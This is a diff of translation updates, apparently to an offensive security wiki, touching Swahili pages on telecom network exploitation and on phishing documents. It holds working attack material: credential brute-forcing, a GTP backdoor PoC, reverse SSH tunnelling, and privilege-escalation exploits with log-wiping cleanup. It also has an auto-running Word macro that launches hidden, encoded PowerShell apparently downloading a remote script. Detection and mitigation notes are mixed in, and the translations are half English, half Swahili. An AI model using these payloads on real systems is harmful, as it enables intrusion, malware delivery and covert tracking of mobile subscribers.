Translated ['src/generic-methodologies-and-resources/pentesting-network/

src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md

@@ -1,27 +1,27 @@
-# Utekaji wa Mtandao wa Telecom (GTP / Roaming Environments)
+# Telecom Network Exploitation (GTP / Roaming Environments)
 
 {{#include ../../banners/hacktricks-training.md}}
 
 > [!NOTE]
-> Mobile-core protocols (GPRS Tunnelling Protocol – GTP) mara nyingi husafiri kwenye semi-trusted GRX/IPX roaming backbones. Kwa sababu zinatumia UDP wazi bila uthibitisho mwingi, **nafasi ya kuingia ndani ya mipaka ya telecom mara nyingi inaweza kufikia ngazi za uashiriaji za msingi moja kwa moja**. Vidokezo vinavyoifuata vinakusanya mbinu za mashambulizi zilizoshuhudiwa kwenye mazingira halisi dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC.
+> Itifaki za core za simu (GPRS Tunnelling Protocol – GTP) mara nyingi hupitia semi-trusted GRX/IPX roaming backbones. Kwa kuwa zinaendeshwa juu ya plain UDP na karibu bila uthibitishaji, **ufikiaji wowote ndani ya mipaka ya telecom mara nyingi unaweza kufikia moja kwa moja signalling planes za core**. Maelezo yafuatayo yanakusanya mbinu za kushambulia zilizoonekana katika mazingira ya vitani dhidi ya SGSN/GGSN, PGW/SGW na nodes nyingine za EPC.
 
-## 1. Uchunguzi & Upataji wa Awali
+## 1. Recon & Initial Access
 
-### 1.1  Akaunti za OSS / NE za Chaguo-msingi
-Seti kubwa, kwa mshangao, ya vendor network elements huja na watumiaji wa SSH/Telnet walio hard-coded kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Orodha maalum ya maneno (wordlist) inaongeza kwa kiasi kikubwa mafanikio ya brute-force:
+### 1.1  Default OSS / NE Accounts
+Seti kubwa kwa kushangaza ya elementi za mtandao kutoka kwa wauzaji huja na watumiaji waliowekwa imara wa SSH/Telnet kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, …  wordlist maalum huongeza kwa kiasi kikubwa mafanikio ya brute-force:
 ```bash
 hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
 ```
-Ikiwa kifaa kinatoa management VRF pekee, pivot kupitia jump host kwanza (angalia sehemu «SGSN Emu Tunnel» hapa chini).
+Ikiwa kifaa kinaonyesha tu management VRF, pivot kupitia jump host kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini).
 
 ### 1.2  Ugundaji wa Host ndani ya GRX/IPX
-Wengi wa waendeshaji wa GRX bado huruhusu **ICMP echo** kupitia backbone. Changanya `masscan` na probe za UDP zilizojengwa `gtpv1` ili ramani kwa haraka wasikilizi wa GTP-C:
+Wengi wa operatori wa GRX bado wanaruhusu **ICMP echo** kupita kwenye backbone. Changanya `masscan` na probes za UDP zilizojengwa `gtpv1` ili kwa haraka ramani ya GTP-C listeners:
 ```bash
 masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
 ```
-## 2. Kuorodhesha Abonenti – `cordscan`
+## 2. Kuorodhesha Abonati – `cordscan`
 
-Zana ifuatayo ya Go inatengeneza vifurushi vya **GTP-C Create PDP Context Request** na inarekodi majibu. Kila jibu linafunua **SGSN / MME** ya sasa inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN aliyotembelewa na abonenti.
+Chombo cha Go kilicho hapa kinatengeneza vifurushi vya **GTP-C Create PDP Context Request** na kurekodi majibu. Kila jibu linafunua **SGSN / MME** ya sasa inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na abonati.
 ```bash
 # Build
 GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
@@ -29,20 +29,20 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
 # Usage (typical):
 ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
 ```
-Bendera kuu:
+Bendera muhimu:
 - `--imsi` IMSI ya mteja lengwa
 - `--oper` Home / HNI (MCC+MNC)
-- `-w`      Andika vifurushi ghafi kwenye pcap
+- `-w`      Andika paketi ghafi kwenye pcap
 
-Vigezo muhimu ndani ya binary vinaweza kurekebishwa ili kupanua skani:
+Konstanti muhimu ndani ya binary zinaweza kubadilishwa ili kupanua skani:
 ```
 pingtimeout       = 3   // seconds before giving up
 pco               = 0x218080
 common_tcp_ports  = "22,23,80,443,8080"
 ```
-## 3. Code Execution over GTP – `GTPDoor`
+## 3. Utekelezaji wa Msimbo kupitia GTP – `GTPDoor`
 
-`GTPDoor` ni huduma ndogo ya ELF ambayo **inasikiliza UDP 2123 na inachambua kila packet ya GTP-C inayokuja**. Wakati payload inaanza na pre-shared tag, sehemu iliyobaki ina-decrypted (AES-128-CBC) na inatekelezwa kupitia `/bin/sh -c`. stdout/stderr zinexfiltrated ndani ya **Echo Response** messages ili hakuna outward session ipatikane.
+`GTPDoor` ni huduma ndogo ya ELF ambayo **binds UDP 2123 and parses every incoming GTP-C packet**. Wakati payload inaanza na pre-shared tag, sehemu iliyobaki ina-decrypted (AES-128-CBC) na inatekelezwa kupitia `/bin/sh -c`. stdout/stderr hu-exfiltrate ndani ya ujumbe za **Echo Response** ili hakuna outward session kamwe isiundwe.
 
 Minimal PoC packet (Python):
 ```python
@@ -52,24 +52,24 @@ cmd = b"id;uname -a"
 enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
 print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
 ```
-Utambuzi:
-* host yoyote inayetuma **unbalanced Echo Requests** kwa anwani za IP za SGSN
-* bendera ya GTP version imewekwa kwa 1 wakati message type = 1 (Echo) – deviation from spec
+Ugunduzi:
+* yoyote mwenyeji anayetuma **unbalanced Echo Requests** kwa anwani za IP za SGSN
+* bendera ya toleo la GTP imewekwa kwa 1 wakati aina ya ujumbe = 1 (Echo) – utofauti na spec
 
 ## 4. Pivoting Through the Core
 
 ### 4.1  `sgsnemu` + SOCKS5
-`OsmoGGSN` hutoa SGSN emulator inayoweza **kuanzisha PDP context kuelekea GGSN/PGW halisi**. Mara baada ya makubaliano, Linux hupokea interface mpya `tun0` inayoweza kufikiwa kutoka kwa roaming peer.
+`OsmoGGSN` inakuja na emulator ya SGSN inayoweza **kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi**. Baada ya kukubaliana, Linux hupokea interface mpya `tun0` inayoweza kufikiwa kutoka kwa roaming peer.
 ```bash
 sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
 -APN internet -c 1 -d
 ip route add 172.16.0.0/12 dev tun0
 microsocks -p 1080 &   # internal SOCKS proxy
 ```
-Kwa hair-pinning sahihi ya firewall, tunnel hii inapita kando ya signalling-only VLANs na inakuweka moja kwa moja kwenye **data plane**.
+Kwa hair-pinning sahihi ya firewall, tundu hili linapita kando ya signalling-only VLANs na linakupeleka moja kwa moja kwenye **safu ya data**.
 
 ### 4.2  SSH Reverse Tunnel over Port 53
-DNS karibu kila mara iko wazi katika miundombinu ya roaming. Fungua huduma ya ndani ya SSH kwa VPS yako ikisikiliza kwenye :53, kisha rudi nyumbani baadaye:
+DNS huwa wazi karibu kila mara katika miundombinu za roaming. Fungua huduma ya ndani ya SSH kwenye VPS yako ikisikiliza kwenye :53 na urudi baadaye kutoka nyumbani:
 ```bash
 ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
 ```
@@ -77,13 +77,13 @@ Hakikisha kwamba `GatewayPorts yes` imewezeshwa kwenye VPS.
 
 ## 5. Covert Channels
 
-| Chaneli | Usafirishaji | Kuutafsiri | Maelezo |
-|---------|--------------|------------|---------|
-| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji pasivu kabisa, hakuna trafiki ya kutoka |
-| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) imekodishwa katika octets za rekodi A | inatazama sub-domain `*.nodep` |
-| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob katika private IE | inajumuika na mazungumzo halali ya GTP-C |
+| Channel | Transport | Decoding | Notes |
+|---------|-----------|----------|-------|
+| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji wa kimyakimya kabisa, hakuna trafiki ya kutoka |
+| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | inatazama `*.nodep` sub-domain |
+| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | inaingiliana na mazungumzo halali ya GTP-C chatter |
 
-Implants zote zina watchdogs zinazofanya **timestomp** binaries zao na ku-re-spawn ikiwa zimecrash.
+All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.
 
 ## 6. Defense Evasion Cheatsheet
 ```bash
@@ -111,79 +111,79 @@ python3 PwnKit.py
 # Sudo Baron Samedit – CVE-2021-3156
 python3 exploit_userspec.py
 ```
-Kidokezo cha usafishaji:
+Dokezo la kusafisha:
 ```bash
 userdel firefart 2>/dev/null
 rm -f /tmp/sh ; history -c
 ```
 ## 8. Zana
 
-* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – zana maalum zilizotajwa katika sehemu zilizopita.
-* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
+* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – custom tooling described in previous sections.
+* `FScan` : msako wa TCP kwenye intranet (`fscan -p 22,80,443 10.0.0.0/24`)
 * `Responder` : LLMNR/NBT-NS rogue WPAD
 * `Microsocks` + `ProxyChains` : pivoting nyepesi ya SOCKS5
-* `FRP` (≥0.37) : uvuka NAT / kuunganisha mali
+* `FRP` (≥0.37) : traversal ya NAT / kuunganisha asset
 
-## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
+## 9. Mashambulizi ya Usajili wa 5G NAS: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
 
-Taratibu ya usajili ya 5G inaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS uanzishwe na Security Mode Command/Complete, ujumbe wa awali hauhakikiwa na haujasimbwa. Dirisha hili kabla ya usalama linaweza kuwezesha njia mbalimbali za kushambulia wakati unaweza kuangalia au kubadilisha trafiki ya N2 (mf., on-path ndani ya core, rogue gNB, au testbed).
+Mchakato wa usajili wa 5G unaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS uanzishwe kwa Security Mode Command/Complete, ujumbe za awali hazijathibitishwa wala hazijafichwa. Dirisha hili kabla ya usalama huruhusu njia mbalimbali za mashambulizi wakati unaweza kuangalia au kuharibu trafiki ya N2 (mf., on-path ndani ya core, rogue gNB, au testbed).
 
-Mtiririko wa usajili (ulifupishwa):
-- Registration Request: UE inatuma SUCI (SUPI iliyosimbwa) na sifa/uwezo.
-- Authentication: AMF/AUSF hutuma RAND/AUTN; UE hurudisha RES*.
-- Security Mode Command/Complete: uadilifu na usimbaji wa NAS vinajadiliwa na kuanzishwa.
+Mtiririko wa usajili (imefupishwa):
+- Registration Request: UE inatuma SUCI (SUPI iliyofichwa) na capabilities.
+- Authentication: AMF/AUSF inatuma RAND/AUTN; UE inarejesha RES*.
+- Security Mode Command/Complete: NAS integrity na ciphering vinajadiliwa na kuanzishwa.
 - PDU Session Establishment: usanidi wa IP/QoS.
 
-Vidokezo vya kuanzisha maabara (si-RF):
-- Core: usanidi wa default wa Open5GS unatosha kuiga mtiririko.
-- UE: simulator au UE ya majaribio; tumia Wireshark kuchambua.
+Vidokezo vya usanidi wa maabara (si-RF):
+- Core: Open5GS default deployment inatosha kuzalisha mtiririko.
+- UE: simulator au UE ya majaribio; decode kwa kutumia Wireshark.
 - Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
-- Useful display filters in Wireshark:
+- Filters muhimu za kuonyesha katika Wireshark:
 - ngap.procedure_code == 15 (InitialUEMessage)
 - nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
 
-### 9.1 Faragha ya kitambulisho: kushindwa kwa SUCI kunachofichua SUPI/IMSI
-Kinachotarajiwa: UE/USIM lazima itume SUCI (SUPI iliyosimbwa kwa funguo ya umma ya home-network). Kupata SUPI/IMSI ya plaintext katika Registration Request kunaonyesha kasoro ya faragha inayoweza kuwezesha ufuatiliaji wa mteja kwa kudumu.
+### 9.1 Faragha ya kitambulisho: SUCI failures exposing SUPI/IMSI
+Inatarajiwa: UE/USIM lazima itume SUCI (SUPI iliyofichwa kwa funguo za umma za mtandao wa nyumbani). Kupata SUPI/IMSI wazi ndani ya Registration Request inaonyesha dosari ya faragha inayowezesha kufuatilia mteja kwa muda mrefu.
 
 Jinsi ya kujaribu:
-- Kamua ujumbe wa kwanza wa NAS katika InitialUEMessage na kagua Mobile Identity IE.
-- Uhakiki wa haraka wa Wireshark:
-- Inapaswa kutafsiriwa kama SUCI, si IMSI.
-- Mfano wa vichujio: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` inapaswa kuwepo; kutokuwepo pamoja na kuwepo kwa `imsi` indicates leakage.
+- Kamata ujumbe wa kwanza wa NAS katika InitialUEMessage na chunguza Mobile Identity IE.
+- Ukaguzi wa haraka kwenye Wireshark:
+- Inapaswa ku-decode kama SUCI, sio IMSI.
+- Filter examples: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` inapaswa kuwepo; kutokuwepo pamoja na uwepo wa `imsi` kunaonyesha kuvuja.
 
-Nini cha kukusanya:
-- MCC/MNC/MSIN ikiwa imefunuliwa; rekodi kwa kila UE na fuatilia kwa muda/mahali.
+Nini kukusanya:
+- MCC/MNC/MSIN ikiwa imetolewa; rejea kwa kila-UE na fuatilia kwa muda/mahali.
 
-Kuzuia:
-- Lazimisha UEs/USIMs zinazotuma SUCI pekee; toa tahadhari kwa IMSI/SUPI yoyote katika NAS ya awali.
+Kupunguza:
+- Lazimisha UEs/USIMs zenye SUCI pekee; toa tahadhari juu ya IMSI/SUPI yoyote katika NAS ya mwanzo.
 
-### 9.2 Kupungua kwa uwezo hadi algorithimu za null (EEA0/EIA0)
-Asili:
-- UE inatangaza EEA (encryption) na EIA (integrity) zinazotegemewa katika UE Security Capability IE ya Registration Request.
-- Mepangilio ya kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algorithimu za null.
+### 9.2 Kupunguza uwezo (capability bidding-down) hadi algoritmu tupu (EEA0/EIA0)
+Mandhari:
+- UE inatangaza EEA (encryption) na EIA (integrity) zinazotunukiwa katika UE Security Capability IE ya Registration Request.
+- Ramani za kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algoritmu tupu (null).
 
 Tatizo:
-- Kwa sababu Registration Request haijalindwa kwa uadilifu, mshambuliaji aliye on-path anaweza kuzima bits za capability ili kulazimisha uteuzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks vibaya huwaruhusu algorithimu za null hata nje ya huduma za dharura.
+- Kwa sababu Registration Request haijalindwa kwa integriti, mshambuliaji aliye on-path anaweza kufuta bits za capability ili kulazimisha uchaguzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks kwa makosa huruhusu algoritmu tupu nje ya huduma za dharura.
 
 Hatua za kushambulia:
-- Shika InitialUEMessage na badilisha NAS UE Security Capability ili itangaze EEA0/EIA0 tu.
-- Kwa Sni5Gect, hook ujumbe wa NAS na patch bits za capability kabla ya kupeleka mbele.
-- Angalia kama AMF inakubali ciphers/udhibiti za null na inakamilisha Security Mode kwa EEA0/EIA0.
+- Intercept InitialUEMessage na badilisha NAS UE Security Capability ili kutangaza tu EEA0/EIA0.
+- Kwa Sni5Gect, hook ujumbe wa NAS na patch bits za capability kabla ya kuendelea.
+- Angalia kama AMF inakubali null ciphers/integrity na inakamilisha Security Mode kwa EEA0/EIA0.
 
-Uthibitisho/uwazi:
-- Katika Wireshark, thibitisha algorithimu zilizochaguliwa baada ya Security Mode Command/Complete.
-- Mfano wa matokeo ya passive sniffer:
+Uhakiki/uwazi:
+- Katika Wireshark, thibitisha algoritmu zilizochaguliwa baada ya Security Mode Command/Complete.
+- Mfano wa output ya passive sniffer:
 ```
 Encyrption in use [EEA0]
 Integrity in use [EIA0, EIA1, EIA2]
 SUPI (MCC+MNC+MSIN) 9997000000001
 ```
-Mikakati ya kupunguza (lazima):
-- Sanidi AMF/policy ili kukataa EEA0/EIA0 isipokuwa pale inapohitajika kwa umakini (mf., simu za dharura).
-- Pendelea kutekeleza EEA2/EIA2 angalau; rekodi na toa onyo/alaramu kwa muktadha wowote wa usalama wa NAS unaojadiliana na null algorithms.
+Mikakati (zinazohitajika):
+- Sanidi AMF/policy kukataa EEA0/EIA0 isipokuwa pale inapotakiwa kwa lazima (kwa mfano, simu za dharura).
+- Pendelea kutekeleza EEA2/EIA2 kama kiwango cha chini; rekodi na toa alarm kwa muktadha wowote wa usalama wa NAS unaojadiliana kuhusu null algorithms.
 
 ### 9.3 Replay ya initial Registration Request (pre-security NAS)
-Kwa sababu initial NAS haina integrity na freshness, InitialUEMessage+Registration Request iliyorekodiwa inaweza kureplayed kwa AMF.
+Kwa sababu initial NAS haina uadilifu na freshness, InitialUEMessage+Registration Request iliyokamatwa inaweza kureplayed kwa AMF.
 
 PoC rule for 5GReplay to forward matching replays:
 ```xml
@@ -208,34 +208,34 @@ boolean_expression="nas_5g.message_type == 65"/>
 </property>
 </beginning>
 ```
-Kile cha kuangalia:
-- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa freshness/context validation unaonyesha udhaifu.
+Kitu cha kuangalia:
+- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa uhakiki wa uhalisia au wa muktadha unaonyesha hatari.
 
-Mitigations:
-- Enforce replay protection/context binding kwenye AMF; rate-limit na correlate per-GNB/UE.
+Marekebisho:
+- Lazimisha replay protection/context binding kwenye AMF; rate-limit na correlate kwa kila GNB/UE.
 
-### 9.4 Tooling pointers (reproducible)
+### 9.4 Vidokezo vya zana (inayoweza kurudiwa)
 - Open5GS: anzisha AMF/SMF/UPF kuiga core; tazama N2 (NGAP) na NAS.
-- Wireshark: hakiki decodes za NGAP/NAS; tumia filters zilizo juu kutenganisha Registration.
-- 5GReplay: capture registration, kisha replay NGAP + NAS messages maalum kama ilivyo kwenye rule.
-- Sni5Gect: live sniff/modify/inject NAS control-plane ili kulazimisha null algorithms au kuingilia authentication sequences.
+- Wireshark: thibitisha ufasiri wa NGAP/NAS; tumia filters zilizo juu ili kutenganisha Registration.
+- 5GReplay: rekodi registration, kisha replay ujumbe maalum za NGAP + NAS kama sheria inavyoeleza.
+- Sni5Gect: sniff/modify/inject NAS control-plane kwa moja kwa moja ili kulazimisha null algorithms au kuingilia authentication sequences.
 
-### 9.5 Defensive checklist
-- Fuatilia kila wakati Registration Request kwa SUPI/IMSI zilizo wazi (plaintext); zuia vifaa/USIMs vinavyokiuka.
-- Kataa EEA0/EIA0 isipokuwa taratibu za dharura zilizoelezwa kwa ukungu; hitaji angalau EEA2/EIA2.
-- Gundua infrastructure haramu au iliyopangwa vibaya: unauthorized gNB/AMF, unexpected N2 peers.
-- Toa onyo kuhusu NAS security modes zinazosababisha null algorithms au replay mara kwa mara za InitialUEMessage.
+### 9.5 Orodha ya ulinzi
+- Endelea kuchunguza Registration Request kwa plaintext SUPI/IMSI; zuia vifaa/USIMs vinavyokiuka.
+- Kataa EEA0/EIA0 isipokuwa kwa taratibu za dharura zilizobainishwa kwa ukomo; hitaji angalau EEA2/EIA2.
+- Gundua miundombinu haribifu au iliyopangwa vibaya: unauthorized gNB/AMF, unexpected N2 peers.
+- Toa onyo kuhusu NAS security modes zinazosababisha null algorithms au replay mara kwa mara ya InitialUEMessage.
 
 ---
-## Detection Ideas
+## Mawazo ya Ugunduzi
 1. **Kifaa chochote isipokuwa SGSN/GGSN kinachounda Create PDP Context Requests**.
-2. **Ports zisizo za kawaida (53, 80, 443) kupokea SSH handshakes** kutoka internal IPs.
-3. **Echo Requests mara kwa mara bila Echo Responses zinazolingana** – inaweza kuashiria GTPDoor beacons.
-4. **Kiwango kikubwa cha trafiki ya ICMP echo-reply yenye identifier/sequence fields kubwa, zisizo sifuri**.
-5. 5G: **InitialUEMessage yenye NAS Registration Requests zinazorudiwa kutoka identical endpoints** (replay signal).
-6. 5G: **NAS Security Mode negotiating EEA0/EIA0** nje ya emergency contexts.
+2. **Porti zisizo za kawaida (53, 80, 443) zinapokea SSH handshakes** kutoka IP za ndani.
+3. **Echo Requests mara kwa mara bila Echo Responses zinazolingana** – inaweza kuonyesha GTPDoor beacons.
+4. **Kiwango kikubwa cha trafiki ya ICMP echo-reply iliyo na uwanja mkubwa wa identifier/sequence usio sifuri**.
+5. 5G: **InitialUEMessage inayobeba NAS Registration Requests zinazorudiwa kutoka vituo sawa** (ishara ya replay).
+6. 5G: **NAS Security Mode inayojadili EEA0/EIA0** nje ya muktadha wa dharura.
 
-## References
+## Marejeo
 
 - [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
 - 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)

src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md

@@ -1,40 +1,40 @@
-# Phishing Faili & Nyaraka
+# Faili na Nyaraka za Phishing
 
 {{#include ../../banners/hacktricks-training.md}}
 
 ## Nyaraka za Office
 
-Microsoft Word hufanya uthibitishaji wa data za faili kabla ya kufungua faili. Uthibitishaji wa data hufanywa kwa njia ya utambuzi wa muundo wa data, dhidi ya kiwango cha OfficeOpenXML. Kama hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
+Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiiki wa data unafanywa kwa njia ya utambuzi wa muundo wa data, kulingana na viwango vya OfficeOpenXML. Ikiwa hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
 
-Kawaida, Word files containing macros use the `.docm` extension. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha nyongeza ya faili na bado kuhifadhi uwezo wao wa kutekeleza macro.\
-Kwa mfano, faili ya RTF kwa kawaida haisaidii macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macro.\
-Miundo na mekanisimu za ndani zile zile zinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint etc.).
+Kwa kawaida, faili za Word zenye macros zinatumia extension ya `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha extension ya faili na bado kuhifadhi uwezo wao wa kutekeleza macros.\
+Kwa mfano, faili ya RTF haiungi mkono macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\
+Mekanismi na vipengele vya ndani sawa vinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint etc.).
 
-Unaweza kutumia amri ifuatayo kuchunguza ni nyongeza zipi zitakazotekelezwa na programu fulani za Office:
+Unaweza kutumia amri ifuatayo kuangalia ni extension zipi ambazo zitatekelezwa na baadhi ya programu za Office:
 ```bash
 assoc | findstr /i "word excel powerp"
 ```
-Faili za DOCX zinazorejelea kiolezo cha mbali (File –Options –Add-ins –Manage: Templates –Go) kinachojumuisha macros zinaweza pia “kutekeleza” macros.
+Faili za DOCX zinazorejelea kiolezo cha mbali (File –Options –Add-ins –Manage: Templates –Go) ambazo zina macros zinaweza pia “execute” macros.
 
-### Kupakia Picha ya Nje
+### Kupakia Picha za Nje
 
 Nenda kwa: _Insert --> Quick Parts --> Field_\
-_**Jamii**: Links and References, **Majina ya field**: includePicture, na **Jina la Faili au URL**:_ http://<ip>/whatever
+_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://<ip>/whatever
 
 ![](<../../images/image (155).png>)
 
 ### Macros Backdoor
 
-Inawezekana kutumia macros kuendesha msimbo wa aina yoyote kutoka kwa hati.
+Inawezekana kutumia macros kuendesha arbitrary code kutoka kwenye dokumenti.
 
 #### Autoload functions
 
-Kadiri zinavyozidi kuwa za kawaida, ndivyo AV inavyoweza kuzitambua.
+Kadiri zinavyokuwa za kawaida zaidi, ndivyo uwezekano wa AV kuzitambua.
 
 - AutoOpen()
 - Document_Open()
 
-#### Mifano ya msimbo ya Macros
+#### Mifano ya Macros Code
 ```vba
 Sub AutoOpen()
 CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
@@ -64,16 +64,16 @@ Dim proc As Object
 Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
 proc.Create "powershell <beacon line generated>
 ```
-#### Ondoa metadata kwa mikono
+#### Ondoa metadata kwa mkono
 
-Nenda kwa **File > Info > Inspect Document > Inspect Document**, ambayo itaonyesha Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
+Nenda kwenye **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
 
-#### Upanuzi wa Doc
+#### Ugani la Doc
 
-Wakati umemaliza, chagua dropdown ya **Save as type**, badilisha fomati kutoka **`.docx`** kuwa **Word 97-2003 `.doc`**.\
-Fanya hivi kwa sababu huwezi kuhifadhi macros ndani ya **`.docx`** na kuna stigma kuhusiana na extension ya macro-enabled **`.docm`** (mf., ikoni ya thumbnail ina `!` kubwa na baadhi ya web/email gateway huziweka block kabisa). Kwa hivyo, extension ya legacy **`.doc`** ni suluhisho bora.
+When finished, select **Save as type** dropdown, change the format from **`.docx`** to **Word 97-2003 `.doc`**.\
+Fanya hivi kwa sababu wewe **can't save macro's inside a `.docx`** na kuna aibu inayohusiana na ugani unaounga mkono macro **`.docm`** (mfano ikoni ya thumbnail ina `!` kubwa na baadhi ya web/email gateway huzuia kabisa). Kwa hiyo, ugani wa zamani **`.doc`** ndio suluhisho bora.
 
-#### Vizalishaji vya Macros Hatari
+#### Malicious Macros Generators
 
 - MacOS
 - [**macphish**](https://github.com/cldrn/macphish)
@@ -81,9 +81,9 @@ Fanya hivi kwa sababu huwezi kuhifadhi macros ndani ya **`.docx`** na kuna stigm
 
 ## Faili za HTA
 
-HTA ni programu ya Windows inayochanganya **HTML na scripting languages (such as VBScript and JScript)**. Inatengeneza interface ya mtumiaji na inaendeshwa kama programu "fully trusted", bila vizingiti vya modeli ya usalama ya browser.
+HTA ni programu ya Windows ambayo **inachanganya HTML na lugha za scripting (such as VBScript and JScript)**. Inaunda kiolesura cha mtumiaji na inatekelezwa kama programu "fully trusted", bila vikwazo vya modeli ya usalama ya browser.
 
-HTA inaendeshwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imewekwa** pamoja na **Internet Explorer**, na hivyo **`mshta` inategemea IE**. Hivyo ikiwa imeondolewa, HTA haziwezi kuendeshwa.
+HTA inatekelezwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **huwekwa** pamoja na **Internet Explorer**, na hivyo kufanya **`mshta` dependant on IE**. Hivyo, kama imeondolewa, HTA hazitaweza kutekelezwa.
 ```html
 <--! Basic HTA Execution -->
 <html>
@@ -140,9 +140,9 @@ self.close
 ```
 ## Kulazimisha NTLM Authentication
 
-Kuna njia kadhaa za **kulazimisha NTLM authentication "kwa mbali"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atafikia (hata HTTP MitM?). Au tuma mwathiriwa **anwani ya mafaili** ambayo itatazua **authentication** tu kwa **kufungua folda.**
